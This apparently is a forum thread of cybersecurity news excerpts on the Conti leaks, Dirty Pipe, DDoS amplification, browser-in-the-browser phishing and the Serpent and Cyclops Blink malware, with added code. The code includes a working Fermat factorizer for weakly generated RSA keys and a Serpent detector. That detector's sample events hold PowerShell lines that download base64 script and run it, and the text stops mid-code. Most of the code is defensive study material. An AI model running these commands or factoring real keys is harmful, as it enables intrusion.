Cyber thread: network espionage, tracking of mobile phones and WLANs, hacking, viruses, DoS etc.

A Ukrainian security researcher this week leaked several years of internal chat logs and other sensitive data tied to Conti, an aggressive and ruthless Russian cybercrime group that focuses on deploying its ransomware to companies with more than $100 million in annual revenue. The chat logs offer a fascinating glimpse into the challenges of running a sprawling criminal enterprise with more than 100 salaried employees. The records also provide insight into how Conti has dealt with its own internal breaches and attacks from private security firms and foreign governments.



As a response to Western warmongering and American threats to use cyber warfare against the citizens of the Russian Federation, the Conti Team is officially announcing that we will use our full capacity to deliver retaliatory measures in case the Western warmongers attempt to target critical infrastructure in Russia or any Russian-speaking region of the world. We do not ally with any government and we condemn the ongoing war. However, since the West is known to wage its wars primarily by targeting civilians, we will use our resources in order to strike back if the well being and safety of peaceful citizens will be at stake due to American cyber aggression.

 
A datacenter fire resulted in internet outages across Iran for around three hours last Friday, and it appears the cause was the nation's surveillance apparatus.

The fire took place at a building belonging to the Telecom Infrastructure Company (TIC) – the only reseller of connectivity to Iranian internet service providers. The TIC applies content filters so that ISPs receive a feed cleansed of anything Iran's rulers don't want citizens to see – which means religious or political content that disagrees in any way with the views of the revolutionary government.

According to Netblocks, the centralized gateway "allows Iranian authorities to control the flow of information to counter cyberthreats, but has also come under scrutiny for its use to limit the public's access to information and international services."
 
 
The name Dirty Pipe is meant to both signal similarities to Dirty Cow and provide clues about the new vulnerability's origins. "Pipe" refers to a pipeline, a Linux mechanism for one OS process to send data to another process. In essence, a pipeline is two or more processes that are chained together so that the output text of one process (stdout) is passed directly as input (stdin) to the next one.

Tracked as CVE-2022-0847, the vulnerability came to light when a researcher for website builder CM4all was troubleshooting a series of corrupted files that kept appearing on a customer's Linux machine. After months of analysis, the researcher finally found that the customer's corrupted files were the result of a bug in the Linux kernel.

The researcher—Max Kellermann of CM4all parent company Ionos—eventually figured out how to weaponize the vulnerability to allow anyone with an account—including least privileged "nobody" accounts—to add an SSH key to the root user's account. With that, the untrusted user could remotely access the server with an SSH window that has full root privileges.
 
Good Lord, what bungling.
– The encrypted connection doesn't work here. We can't reach anyone, comes the reply.

According to Grozev, this is the expensive Era communication system that the Russian Ministry of Defence took into use last year. For one reason or another, it does not appear to have worked in Ukraine.
According to Christo Grozev, the reason may be the absence of 3G and 4G networks. Era uses these networks, but Russian forces have destroyed most of the telecommunications masts, for example in the Kharkiv region.

– The Russian army is equipped with secure phones that don't work in the areas where it operates, he sums up.


Grozev characterizes this as "the biggest military operational security failure of all time".

edit: AP's tweets
 
One of the oldest amplification vectors is misconfigured DNS servers, which increase DDoS volumes by about 54 times. New amplification routes have included the Network Time Protocol servers (about 556x), Plex media servers (about 5x), Microsoft RDP (86x), and the Connectionless Lightweight Directory Access Protocol (at least 50x). Just last week, researchers described a new amplification vector that achieves a factor of at least 65.

Previously, the biggest known amplifier was memcached, which has the potential to increase traffic by an astounding 51,000x.

The newest entrant is the Mitel MiCollab and MiVoice Business Express collaboration systems. Attackers have been using them for the past month to DDoS financial institutions, logistics companies, gaming companies, and organizations in other markets. A fleet of 2,600 servers is exposing an abusable system test facility in the software to the Internet through UDP port 10074, in a break with manufacturer recommendations that the tests be reachable only internally.
The new amplification vector provided by the misconfigured Mitel servers has the potential to shatter those records. The vector can do this not only because of the unprecedented 4 billion-fold amplification potential, but also because the Mitel systems can stretch out the attacks for lengths of time not previously possible.

“This particular attack vector differs from most UDP reflection/amplification attack methodologies in that the exposed system test facility can be abused to launch a sustained DDoS attack of up to 14 hours in duration by means of a single spoofed attack initiation packet, resulting in a record-setting packet amplification ratio of 4,294,967,296:1,” researchers from eight organizations wrote in a joint advisory. “A controlled test of this DDoS attack vector yielded more than 400mpps of sustained DDoS attack traffic.”

A single abusable node generating this much amplification at a rate of 80 thousand packets per second can theoretically deliver the 14-hour data flood. Over that time, “counter” packets—which track the number of responses the servers send—would generate roughly 95.5GB of amplified attack traffic destined for the targeted network. Separate “diagnostic output” packets could account for an additional 2.5TB of attack traffic directed toward the target.
 
It turns out that even criminal operations are having difficulty hiring and keeping good staff these days. "Conti understands that the turnover ratio of workers is also very high due to the fact that they are running a criminal organization," BreachQuest wrote. "The Conti group has an HR/Recruiter that assists with the continual finding and recruitment of new candidates."

While Conti has been known for big game hunting — or focusing on high-value targets that will likely pay big bucks to get its encrypted data restored, or to prevent exfiltrated info from being publicly leaked — BreachQuest goes into detail about how Conti ensures that its processes pay off:

When the Conti group compromises Active Directory, they are looking for potentially interesting people like an admin, engineer, or someone in IT. Many companies think that backups are sufficient, but Conti hunts for backup servers to encrypt the backups as well, and training manuals reveal that they know techniques to bypass backup storage vendors to make sure the backups are encrypted.
One of the instructions that stood out the most was a section titled "HOW AND WHAT INFO TO DOWNLOAD", in which they state that after raising privileges to domain admin and invoking share finder, what Conti is interested in are financial documents, accounting, clients, projects, and much more.


CyberArk posted its own analysis of the Conti leaks, and says the information can help organizations protect themselves. One of the data dumps included 12 git repositories of what's said to be internal Conti software.

"Upon quick inspection of these repositories, most of the code appears to be open-source software that is used by the Conti group," the analysis said. "For instance, yii2 or Kohana is used as part of (what seems to be) the admin panel. The code is mostly written in PHP and is managed by Composer, with the exception of one repository of a tool written in Go."

Techniques from the chat:
Active Directory Enumeration
SQL Databases Enumeration via sqlcmd.
How to gain access to Shadow Protect SPX (StorageCraft) backups.
How to create NTDS dumps vs vssadmin
How to open New RDP Port 1350

List of Tools:
Cobalt Strike
Metasploit
PowerView
ShareFinder
AnyDesk
Mimikatz
 
In explaining the vulnerability, Böck wrote:


The idea of Fermat's factorization algorithm is that a product of two large primes can always be written as N=(a-b)(a+b), with a being the middle between the two primes and b the distance from the middle to each of the primes.
If the primes are close then a is close to the square root of N. This allows guessing the value a by starting with the square root of N and then incrementing the guess by one each round.
For each guess, we can calculate b^2 = a^2 - N. If the result is a square, we know we have guessed a correctly. From this, we can calculate p=a+b and q=a-b.
Fermat described this algorithm originally in a letter in 1643. The text of the original letter can be found in Oeuvres de Fermat, page 256, available at the Internet Archive.


He continued:


How can this happen?
An RSA library is vulnerable if the two primes p and q are close. If the primes are generated independently and randomly, then the likelihood of p and q being close is negligible.
An RSA library might, however, implement a flawed key generation algorithm like this:
  • Generate random number X.
  • Search the next prime after X and use it as p.
  • Search the next prime after p and use it as q.
For common RSA key sizes, this creates p and q with a difference that is usually in the thousands or lower. This can easily be broken with Fermat's factorization method.
How "close" do primes need to be in order to be vulnerable?
With common RSA key sizes (2048 bit) in our tests, the Fermat algorithm with 100 rounds reliably factors numbers where p and q differ up to 2^517. In other words, it can be said that primes that only differ within the lower 64 bytes (or around half their size) will be vulnerable.
Up to 2^514 it almost always finds the factorization in the first round of the algorithm. It could be argued that the 100 rounds is therefore excessive; however, the algorithm is so fast that it practically does not matter much.
Can vulnerable keys be generated by accident if primes are generated randomly and independently?
This is almost impossible. For primes to be "close" they would have to be identical at least on their upper 500 bits. The chance of that happening is therefore smaller than 1:2^500.
The discovery of these keys doesn't indicate that they've created much of a security risk, particularly because none of them are used for especially sensitive applications. Still, it's possible that the discovery indicates a larger problem and that more vulnerable keys or key-generation software are still out there.
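As an added example (my code, not Böck's or the article's), the flawed generator the post describes sits beside Fermat's method, so the claims above can be checked end to end; key sizes are scaled down in the self-test for speed.

```python
from math import isqrt
import random

# Added example, not taken from Böck's post: a probabilistic primality test,
# the flawed "next prime after the next prime" generator the post describes,
# and Fermat's factorization exactly as the post outlines it.

SMALL_PRIMES = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47)


def is_probable_prime(n: int, rounds: int = 24) -> bool:
    """Miller-Rabin test, with trial division by small primes first."""
    if n < 2:
        return False
    for p in SMALL_PRIMES:
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        a = random.randrange(2, n - 1)
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def next_prime(n: int) -> int:
    """Smallest prime strictly greater than n (n assumed > 2)."""
    c = n + 1 if n % 2 == 0 else n + 2
    while not is_probable_prime(c):
        c += 2
    return c


def flawed_keygen(bits: int) -> tuple:
    """The broken scheme from the post: p = nextprime(X), q = nextprime(p).
    Returns (p, q); their difference is just a prime gap, i.e. a few thousand."""
    half = bits // 2
    x = random.getrandbits(half) | (1 << (half - 1))  # force full length
    p = next_prime(x)
    q = next_prime(p)
    return p, q


def fermat_factor(n: int, max_rounds: int = 100):
    """Write n = (a - b)(a + b): start at a = ceil(sqrt(n)), step a by one,
    and stop when a^2 - n is a perfect square. Returns (a + b, a - b) or None."""
    a = isqrt(n)
    if a * a < n:
        a += 1
    for _ in range(max_rounds):
        b2 = a * a - n
        b = isqrt(b2)
        if b * b == b2:
            return a + b, a - b
        a += 1
    return None


if __name__ == "__main__":
    # Why round one is enough: sqrt(pq) falls short of (p+q)/2 by about
    # (q-p)^2 / (8 sqrt(pq)), which for a prime-gap-sized difference is far below 1.
    p, q = flawed_keygen(2048)
    print("q - p =", q - p)
    print("recovered in round 1:", fermat_factor(p * q, max_rounds=1) == (q, p))
```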
 
Amid the ongoing disruption from Russia, some ethical hackers in Ukraine are feeling lost as bug bounty platform HackerOne has allegedly withheld their payouts. The loss due to the sudden halt is said to have mounted to hundreds and thousands of dollars. A few of the affected ethical hackers — also known as cybersecurity researchers — have taken the issue to social media. Some of them have also written to the platform to get clarity on why exactly it has disabled their payments in the middle of the humanitarian catastrophe in the country.

Ethical hackers normally earn payouts ranging from tens and hundreds to over millions of dollars in the form of rewards through bug bounty platforms for reporting flaws in various Internet-based solutions. However, HackerOne is said to have suddenly stopped payouts for some Ukrainian hackers.

Earlier this month, HackerOne CEO Marten Mickos had announced, "[A]s we work to comply with the new sanctions, we'll withdraw all programmes for customers based in Russia, Belarus, and the occupied areas of Ukraine." On Monday, he clarified that the restrictions were for sanctioned regions - Russia and Belarus, not mentioning any clear details about the status of Ukraine.

“That's a really weird situation,” said independent security researcher Bob Diachenko, who has been associated with the San Francisco, California-based platform for the last two–three years now.

The security researcher tweeted on Sunday that HackerOne stopped paying bounties worth around $3,000 (roughly Rs. 2,30,000) for the flaws he reported.

Alongside stopping payouts, HackerOne has removed its ‘Clear' status from all Ukraine accounts. The status essentially allows ethical hackers to participate in private programmes run by various companies to earn a minimum of $2,000 (roughly Rs. 1,53,100) for a high-severity vulnerability or $5,000 (roughly Rs. 3,82,800) for a critical one. It requires background-check for researchers to participate in the listed programmes.
 
An audit of NASA's infosec preparedness against insider threats has warned it faces "serious jeopardy to operations" due to lack of protection for unclassified information.

A Monday report [PDF] found that NASA has done well, as required, in its efforts to defend and prevent insider threats to classified information – stuff that NASA defines as "Official information regarding the national security that has been designated Confidential, Secret, or Top Secret."

The report found the agency has deployed defenses including user activity monitoring, adopted mandatory agency-wide insider threat training, and "created an insider threat reference website that assists employees and contractors with identifying threats, their risks, and follow-up information." Procurement controls are being strengthened in ways that address risks of foreign influence.

But while the report is satisfied NASA has done well to protect its classified info, it notes that "the vast majority" of NASA tech is not classified, including plenty of "high-value assets and critical infrastructure." Among those assets are "sensitive and valuable information such as scientific, engineering, or research data; human resources files; or procurement sensitive information." Because that infrastructure is not classified, it's not covered by the insider threat program.

And that's a worry, because in 2021 NASA's auditor found "incidents of improper use of NASA IT systems had increased from 249 in 2017 to 1,103 in 2020 – a 343 per cent growth; the most prevalent error was failing to protect Sensitive but unclassified (SBU) information."
 
The Conti ransomware gang was on top of the world. The sprawling network of cybercriminals extorted $180 million from its victims last year, eclipsing the earnings of all other ransomware gangs. Then it backed Vladimir Putin’s invasion of Ukraine. And it all started falling apart.

Conti’s implosion started with a single post on the group’s website, usually reserved for posting the names of its victims. Hours after Russian troops crossed Ukrainian borders on February 24, Conti offered its “full support” to the Russian government and threatened to hack critical infrastructure belonging to anyone who dared to launch cyberattacks against Russia.

But while many Conti members live in Russia, its scope is international. The war has divided the group; privately, some had railed against Putin’s invasion. And while Conti’s ringleaders scrambled to retract their statement, it was too late. The damage had been done. Especially because the dozens of people with access to Conti’s files and internal chat systems included a Ukrainian cybersecurity researcher who had infiltrated the group. They proceeded to rip Conti wide open.
 
After years of tantalizing hints that a passwordless future is just around the corner, you're probably still not feeling any closer to that digital unshackling. Ten years into working on the issue, though, the FIDO Alliance, an industry association that specifically works on secure authentication, thinks it has finally identified the missing piece of the puzzle.

On Thursday, the organization published a white paper that lays out FIDO's vision for solving the usability issues that have dogged passwordless features and, seemingly, kept them from achieving broad adoption. FIDO's members collaborated to produce the paper, and they span chipmakers like Intel and Qualcomm, prominent platform developers like Amazon and Meta, financial institutions like American Express and Bank of America, and the developers of all major operating systems—Google, Microsoft, and Apple.

The paper is conceptual, not technical, but after years of investment to integrate what are known as the FIDO2 and WebAuthn passwordless standards into Windows, Android, iOS, and more, everything is now riding on the success of this next step.

“The key to being successful for FIDO is being readily available—we need to be as ubiquitous as passwords,” says Andrew Shikiar, executive director of the FIDO Alliance. “Passwords are part of the DNA of the web itself, and we’re trying to supplant that. Not using a password should be easier than using a password.”

In practice, though, even the most seamless passwordless schemes are not quite there. Part of the challenge simply lies with the enormous inertia passwords have built up. Passwords are difficult to use and manage, which drives people to take shortcuts like reusing them across accounts and creates security issues at every turn. Ultimately, though, they’re the devil you know. Educating consumers about passwordless alternatives and getting them comfortable with the change has proven difficult.

Beyond just acclimating people, though, FIDO is looking to get to the heart of what still makes passwordless schemes tough to navigate. And the group has concluded that it all comes down to the procedure for switching or adding devices. If the process for setting up a new phone, say, is too complicated, and there’s no simple way to log in to all of your apps and accounts—or if you have to fall back to passwords to reestablish your ownership of those accounts—then most users will conclude that it’s too much of a hassle to change the status quo.

The passwordless FIDO standard already relies on a device’s biometric scanners (or a master PIN you select) to authenticate you locally without any of your data traveling over the Internet to a web server for validation. The main concept that FIDO believes will ultimately solve the new device issue is for operating systems to implement a “FIDO credential” manager, which is somewhat similar to a built-in password manager. Instead of literally storing passwords, this mechanism will store cryptographic keys that can sync between devices and are guarded by your device’s biometric or passcode lock.

At Apple’s Worldwide Developer Conference last summer, the company announced its own version of what FIDO is describing, an iCloud feature known as “Passkeys in iCloud Keychain,” which Apple says is its “contribution to a post-password world.”

How can putting all your eggs in one basket be a good idea, when one of the first infosec lessons is that nothing is secure forever. Nothing.
 
A developer has been caught adding malicious code to a popular open-source package that wiped files on computers located in Russia and Belarus as part of a protest that has enraged many users and raised concerns about the safety of free and open source software.

The application, node-ipc, adds remote interprocess communication and neural networking capabilities to other open source code libraries. As a dependency, node-ipc is automatically downloaded and incorporated into other libraries, including ones like Vue.js CLI, which has more than 1 million weekly downloads.

Two weeks ago, the node-ipc author pushed a new version of the library that sabotaged computers in Russia and Belarus, the countries invading Ukraine and providing support for the invasion, respectively. The new release added a function that checked the IP address of developers who used the node-ipc in their own projects. When an IP address geolocated to either Russia or Belarus, the new version wiped files from the machine and replaced them with a heart emoji.

A new phenomenon: protestware.
 
A novel way of tricking people out of their passwords has left us wondering if there's a need to rethink how much we trust our web browsers to protect us and to accelerate efforts to close web security gaps.

Earlier this week, an infosec researcher known as mr.d0x described a browser-in-the-browser (BitB) attack. It's a way to steal login credentials by simulating the little browser windows that Google, Microsoft, and other authentication service providers pop up that ask you for your username and password to continue. You've probably seen these windows: you click on something like a "Sign in with Microsoft" button on a website, and a popup appears asking for your credentials to access your account or profile.

Services like Google Sign-In will display a Google URL in the popup window navigation bar, which offers some reassurance that the login service is actually coming from a trusted company and not an unknown one. And bypassing defenses built into the user's browser to fool them into trusting a malicious page tends to be difficult in the absence of an exploitable vulnerability, thanks to browser security mechanisms including Content Security Policy settings and the Same-origin policy security model.

However, there are methods like clickjacking or user-interface redressing that alter the appearance of browsers and web pages to dupe people in ways that bypass security controls. A clickjacking attack might, for example, interpose a transparent element over a web page button so that a user's click event gets hijacked for some nefarious purpose.

The BitB attack extends this technique by creating an entirely fabricated browser window, including trust signals like a locked padlock icon and a known (but faked) URL. You think you're seeing a real popup window, but it's actually just faked within the page, and ready to capture your credentials.

"Fortunately for us, replicating the entire window design using basic HTML/CSS is quite simple," explains mr.d0x. "Combine the window design with an iframe pointing to the malicious server hosting the phishing page, and it's basically indistinguishable."

This technique, says mr.d0x, makes phishing more effective. Victims would still need to visit a compromised or malicious website to generate the popup but thereafter will be more likely to submit credentials because nothing looks amiss.

There are limitations to this approach because while it may deceive people, it's unlikely to fool other software. Password managers, for example, probably wouldn't autofill credentials into a BitB window because they wouldn't see it as a real browser window.

Nonetheless, BitB has raised concern among some security researchers as a way to exploit the insecurity of the ad ecosystem.

The simplest remedy is to block all pop-up windows, but that may not be the easiest solution for everyone.
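As an added example of why a password manager is not fooled (my code, not mr.d0x's or the article's): the fill decision keys on the real document origin of the frame, never on the URL text painted inside the page. All URLs and the top-level-only rule are constructed assumptions for this illustration.

```python
from typing import Optional
from urllib.parse import urlsplit

# Added example, not from mr.d0x's write-up: the origin check a credential
# store makes before autofilling. A BitB "window" is an iframe loaded from the
# attacker's server, so its real origin never matches the saved one, however
# convincing its fake address bar looks. Hostnames below are made up.


def origin_of(url: str) -> Optional[str]:
    """Canonical https origin (scheme://host:port) or None if unusable."""
    parts = urlsplit(url)
    if parts.scheme != "https" or not parts.hostname:
        return None  # no credential fill over plain http or odd schemes
    try:
        port = parts.port or 443
    except ValueError:  # malformed port component
        return None
    # .hostname already strips any "user@" prefix and lowercases the host,
    # so "https://accounts.google.com@phish.example/" resolves to phish.example
    return f"https://{parts.hostname}:{port}"


def should_autofill(frame: dict, saved_origin: str) -> tuple:
    """frame = {"document_url": what the browser actually loaded,
                "painted_url":  what the page's fake address bar shows (ignored),
                "is_top_level": True only for a genuine popup window}."""
    real = origin_of(frame["document_url"])
    if real is None:
        return False, "no https origin"
    if real != saved_origin:
        return False, f"origin mismatch: {real}"
    if not frame.get("is_top_level", False):
        # Assumed policy in this example: sign-in pages are filled only when
        # they are the top-level document, never when framed by another site.
        return False, "login document is framed"
    return True, "ok"


SAVED_ORIGIN = "https://accounts.google.com:443"  # what the vault stored

# Constructed frames: one genuine popup and three impostors.
GENUINE_POPUP = {"document_url": "https://accounts.google.com/o/oauth2/auth?client_id=x",
                 "painted_url": "https://accounts.google.com/o/oauth2/auth",
                 "is_top_level": True}
BITB_FRAME = {"document_url": "https://phish.example/google-login.html",
              "painted_url": "https://accounts.google.com/o/oauth2/auth",
              "is_top_level": False}
LOOKALIKE = {"document_url": "https://accounts.google.com.phish.example/login",
             "painted_url": "https://accounts.google.com/",
             "is_top_level": True}
USERINFO_TRICK = {"document_url": "https://accounts.google.com@phish.example/login",
                  "painted_url": "https://accounts.google.com/",
                  "is_top_level": True}

if __name__ == "__main__":
    for label, frame in [("genuine", GENUINE_POPUP), ("bitb", BITB_FRAME),
                         ("lookalike", LOOKALIKE), ("userinfo", USERINFO_TRICK)]:
        print(label, should_autofill(frame, SAVED_ORIGIN))
```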
 
Cyclops Blink malware has infected ASUS routers in what Trend Micro says looks like an attempt to turn these compromised devices into command-and-control servers for future attacks.

ASUS says it's working on a remediation for Cyclops Blink and will post software updates if necessary. The hardware maker recommends users reset their gateways to factory settings to flush away any configurations added by an intruder, change the login password, make sure remote management access from the WAN is disabled, and ensure the latest firmware is installed to be safe.

Cyclops Blink has ties to Kremlin-backed Sandworm, the criminal gang behind the nasty VPNFilter malware that in 2018 targeted routers and storage devices. The crew also carried out several high-profile attacks including the 2015 and 2016 cyber-assaults on Ukraine's electrical grid, NotPetya in 2017, and the French presidential campaign email leak that same year.

A Trend Micro warning about the router hijackings follows a joint advisory last month from the FBI, CISA, the US Department of Justice, and the UK National Cyber Security Centre about Cyclops Blink, which the agencies said looked to be Sandworm's replacement for VPNFilter. At the time, the botnet had its sights set on WatchGuard firewall appliances.

"Our data also shows that although Cyclops Blink is a state-sponsored botnet, its C&C servers and bots affect WatchGuard Firebox and Asus devices that do not belong to critical organizations, or those that have an evident value on economic, political, or military espionage," Trend Micro said. "Hence, we believe that it is possible that the Cyclops Blink botnet's main purpose is to build an infrastructure for further attacks on high-value targets."
It's not clear exactly right now how the malware gets onto a device, though it probably involves exploiting a default admin password to gain access via an enabled remote management service. According to Trend Micro's Cyclops Blink technical analysis, once the modular malware, written in C, has been injected into the gateway and is running, it sets itself up and renames its process to "[ktest]" presumably to appear as a Linux kernel thread.

Next, it waits for 37 seconds and decides on the hard-coded command-and-control (C2) server to talk to along with the rate at which it communicates with the box. Then it begins communicating with its C2 server using an OpenSSL-encrypted channel to join the Cyclops Blink botnet. Among the commands it can receive, the compromised router can be given more malware to run, allowing the botnet's controllers to do whatever they like on the hijacked gateways.
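A defender-side check for the "[ktest]" trick described above, as an added example (my code, not Trend Micro's): a genuine Linux kernel thread is a child of kthreadd (PID 2), has an empty cmdline and no readable /proc/PID/exe, so a renamed user-space process fails at least one of those tests. The sample records are constructed; scan_proc() reads a live /proc when one exists.

```python
import os

# Added example, not from Trend Micro's analysis: flag processes that wear a
# kernel-thread-style name without being kernel threads. Records are dicts
# with pid, ppid, comm, cmdline, exe (readlink of /proc/PID/exe or None) and
# state (first letter of the State: line in /proc/PID/status).


def is_real_kernel_thread(rec: dict) -> bool:
    """kthreadd itself or one of its children, with no exe and no argv."""
    return (rec["pid"] == 2 or rec["ppid"] == 2) and rec["exe"] is None and rec["cmdline"] == ""


def looks_like_kernel_thread(rec: dict) -> bool:
    """ps shows kernel threads in brackets; malware either names itself
    "[ktest]" outright or blanks argv so ps brackets the name for it."""
    return rec["comm"].startswith("[") or rec["cmdline"] == ""


def find_masqueraders(records) -> list:
    """PIDs that look like kernel threads but are not (zombies excluded,
    since they legitimately have no cmdline and no exe)."""
    return [rec["pid"] for rec in records
            if rec.get("state") != "Z"
            and looks_like_kernel_thread(rec)
            and not is_real_kernel_thread(rec)]


def scan_proc() -> list:
    """Collect records from a live Linux /proc; returns [] elsewhere.
    Run as root: unprivileged readlink of another user's exe fails."""
    out = []
    if not os.path.isdir("/proc"):
        return out
    for pid_s in os.listdir("/proc"):
        if not pid_s.isdigit():
            continue
        pid = int(pid_s)
        try:
            fields = {}
            with open(f"/proc/{pid}/status") as f:
                for line in f:
                    key, _, val = line.partition(":")
                    fields[key] = val.strip()
            with open(f"/proc/{pid}/comm") as f:
                comm = f.read().strip()
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                cmdline = f.read().replace(b"\0", b" ").decode(errors="replace").strip()
            try:
                exe = os.readlink(f"/proc/{pid}/exe")
            except OSError:
                exe = None
            out.append({"pid": pid, "ppid": int(fields["PPid"]), "comm": comm,
                        "cmdline": cmdline, "exe": exe, "state": fields["State"][:1]})
        except (OSError, KeyError, ValueError):
            continue  # process vanished or not readable
    return out


SAMPLE_RECORDS = [  # constructed for this example
    {"pid": 2, "ppid": 0, "comm": "kthreadd", "cmdline": "", "exe": None, "state": "S"},
    {"pid": 15, "ppid": 2, "comm": "kworker/0:1", "cmdline": "", "exe": None, "state": "I"},
    {"pid": 900, "ppid": 1, "comm": "[ktest]", "cmdline": "[ktest]", "exe": "/tmp/.x/cb", "state": "S"},
    {"pid": 901, "ppid": 1, "comm": "ktest", "cmdline": "", "exe": "/tmp/.x/cb", "state": "S"},
    {"pid": 950, "ppid": 1, "comm": "bash", "cmdline": "", "exe": None, "state": "Z"},
    {"pid": 1234, "ppid": 1, "comm": "sshd", "cmdline": "/usr/sbin/sshd -D", "exe": "/usr/sbin/sshd", "state": "S"},
]

if __name__ == "__main__":
    print("sample:", find_masqueraders(SAMPLE_RECORDS))
    print("live:", find_masqueraders(scan_proc()))
```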
 
Pro-Ukraine security researcher @ContiLeaks yesterday uploaded a fresher version of Conti ransomware than they had previously released – specifically, the source code for Conti Ransomware V3.0 – to VirusTotal.

ContiLeaks posted a link to the code on Twitter. The code includes a compiled locker and decryptor, according to vx-underground, which has been archiving the leaks.

The archive is password-protected, but the password is easy to figure out, according to replies to ContiLeaks’ release.

source conti v3. https://t.co/1dcvWYpsp7
— conti leaks (@ContiLeaks) March 20, 2022

ContiLeaks followed up in a few hours by thumbing their nose at the pro-Russia law enforcement that the researcher said is looking for them in the UA – in other words, in Ukraine.

“i can tell you good luck mf!” ContiLeaks tweeted, using another acronym that probably doesn’t need explaining.
In related news, on Monday, eSentire’s Threat Research Unit (TRU) published a report about a new Conti affiliate group. The report details new accounts, specific IP addresses, domain names and Protonmail email accounts linked to the affiliate, Indicators of Compromise that organizations should address immediately, an overview of attack vectors, and how the affiliate is – like so many criminals – abusing the Cobalt Strike intrusion framework for attack purposes.

eSentire’s report details one such Cobalt Strike incident, nicknamed ShadowBeacon, during which the Cobalt beacons were being deployed from the domain controllers via PsExec: a legitimate admin tool used for remotely executing binaries.

Together with BreakPoint Labs (BPL), TRU observed threat actors leveraging the Cobalt Strike infrastructure to attack seven different U.S. companies between 2021 and 2022. According to eSentire, victims included companies in the financial, environmental, legal and charitable sectors.

“The Windows logs revealed that the threat actor had been able to register their own virtual machine on the victim organization’s network,” the report noted, “using it as a pivot to their actual, exterior [command-and-control, aka C2, server].”
 
Researchers have discovered a cyberattack that uses unusual evasion tactics to backdoor French organizations with a novel malware dubbed Serpent, they said.

A team from Proofpoint observed what they call an “advanced, targeted threat” that uses email-based lures and malicious files typical of many malware campaigns to deliver its ultimate payload to targets in the French construction, real-estate and government industries.

However, between initial contact and payload, the attack uses methods to avoid detection that haven’t been seen before, researchers revealed in a blog post Monday.
The attack chain begins as many email-based attacks do—with an email that appears to be coming from a legitimate source that includes a Microsoft Word document containing malicious macros. Various parts of the macro include ASCII art that depicts a snake, giving the backdoor its name, researchers said.

The macro-laden document purports to have important information related to the “règlement général sur la protection des données (RGPD),” aka the European Union’s General Data Protection Regulations (GDPR), a law which mandates how companies must report data leaks to the government.

If macros are enabled, the document executes the document's macro, which reaches out to an image URL (e.g., https://www.fhccu[.]com/images/ship3[.]jpg) that contains a base64-encoded PowerShell script hidden using steganography.

The PowerShell script first downloads, installs and updates the installer package and repository script for Chocolatey, a software management automation tool for Windows that wraps installers, executables, .ZIP files and scripts into compiled packages, researchers said.

“Leveraging Chocolatey as an initial payload may allow the threat actor to bypass threat-detection mechanisms because it is a legitimate software package and would not immediately be identified as malicious,” researchers noted.

The script then uses Chocolatey to install Python, including the pip Python package installer. This component then installs various dependencies including PySocks, a Python-based reverse proxy client that enables users to send traffic through SOCKS and HTTP proxy servers, researchers said.

Next, the PowerShell script fetches another image file (e.g., https://www.fhccu[.]com/images/7[.]jpg), which contains a base64-encoded Python script that is also obscured using steganography, they said. The PowerShell script saves the Python script as "MicrosoftSecurityUpdate.py" and then creates and executes a .bat file that in turn executes the Python script.

The attack chain ends with a command to a shortened URL which redirects to the Microsoft Office help website, researchers said. The steganographic images used to hide the scripts are hosted on what appears to be a Jamaican credit-union website, they added.
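Detection logic for the chain just described, as an added example (my code, not Proofpoint's): each stage becomes a predicate over process-creation records, and an alert needs several stages to co-occur, because Chocolatey and Python on their own are legitimate admin activity. The events below are constructed (hostnames, paths and command lines are made up, not the report's indicators); the field names mirror a typical EDR/Sysmon process-create record.

```python
# Added example, not from Proofpoint's report: stage matching over constructed
# process-creation events for the Word -> PowerShell -> Chocolatey -> Python
# -> PySocks -> .bat -> "MicrosoftSecurityUpdate.py" chain described above.

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def office_spawns_powershell(e: dict) -> bool:
    return basename(e["parent_image"]) in OFFICE_APPS and basename(e["image"]) == "powershell.exe"


def powershell_pulls_script_from_image(e: dict) -> bool:
    cl = e["command_line"].lower()
    return basename(e["image"]) == "powershell.exe" and ".jpg" in cl and "frombase64string" in cl


def powershell_bootstraps_chocolatey(e: dict) -> bool:
    cl = e["command_line"].lower()
    return basename(e["image"]) == "powershell.exe" and "chocolatey" in cl and "install.ps1" in cl


def chocolatey_installs_python(e: dict) -> bool:
    return basename(e["image"]) == "choco.exe" and "python" in e["command_line"].lower()


def pip_installs_pysocks(e: dict) -> bool:
    return basename(e["image"]) in {"pip.exe", "python.exe"} and "pysocks" in e["command_line"].lower()


def batch_runs_fake_updater(e: dict) -> bool:
    cl = e["command_line"].lower()
    return (basename(e["parent_image"]) == "cmd.exe" and basename(e["image"]) == "python.exe"
            and "microsoftsecurityupdate.py" in cl)


STAGES = [  # in chain order
    ("office_spawns_powershell", office_spawns_powershell),
    ("powershell_pulls_script_from_image", powershell_pulls_script_from_image),
    ("powershell_bootstraps_chocolatey", powershell_bootstraps_chocolatey),
    ("chocolatey_installs_python", chocolatey_installs_python),
    ("pip_installs_pysocks", pip_installs_pysocks),
    ("batch_runs_fake_updater", batch_runs_fake_updater),
]


def matched_stages(events) -> list:
    """Names of stages seen at least once, in chain order."""
    return [name for name, pred in STAGES if any(pred(e) for e in events)]


def is_serpent_like(events, min_stages: int = 3) -> bool:
    """Alert only when several stages of this specific chain co-occur."""
    return len(matched_stages(events)) >= min_stages


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CHOCO_BOOTSTRAP = ("powershell -c \"iex ((New-Object Net.WebClient)"
                   ".DownloadString('https://community.chocolatey.org/install.ps1'))\"")

SAMPLE_EVENTS = [  # constructed, one record per stage
    {"parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "image": PS,
     "command_line": "powershell -w hidden -c \"$p=(iwr https://images.example/ship3.jpg).Content;"
                     " iex ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($s)))\""},
    {"parent_image": PS, "image": PS, "command_line": CHOCO_BOOTSTRAP},
    {"parent_image": PS, "image": r"C:\ProgramData\chocolatey\choco.exe", "command_line": "choco install python -y"},
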